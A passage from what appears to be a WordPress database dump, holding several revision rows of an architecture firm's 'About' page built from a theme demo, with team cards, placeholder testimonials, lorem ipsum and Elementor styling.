</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">\n                            	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/kevin-martin/\">\n                            	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/sarah-albert/\">\n                            	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2022-11-25 07:42:43','2022-11-25 07:42:43','',38,'https://bauhaus.futuremediatrix.com/?p=4741',0,'revision','',0),(4742,1,'2022-11-25 07:42:43','2022-11-25 07:42:43','<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>Get to know us</h3>\n														<h2>\n								Most experienced architects & designers							</h2>\n		There are certain attributes of a profession and one has to catch hold of them in order to work efficiently and grow in that business. I share my experience as an interior designer, a profession of great esthetic value and charm.		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">\n                            	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/kevin-martin/\">\n                            	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/sarah-albert/\">\n                            	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2022-11-25 07:42:43','2022-11-25 07:42:43','',38,'https://bauhaus.futuremediatrix.com/?p=4742',0,'revision','',0),(4743,1,'2022-11-25 07:42:43','2022-11-25 07:42:43','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2022-11-25 07:42:43','2022-11-25 07:42:43','',38,'https://bauhaus.futuremediatrix.com/?p=4743',0,'revision','',0),(4746,2,'2023-05-25 10:13:57','2023-05-25 10:13:57','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a 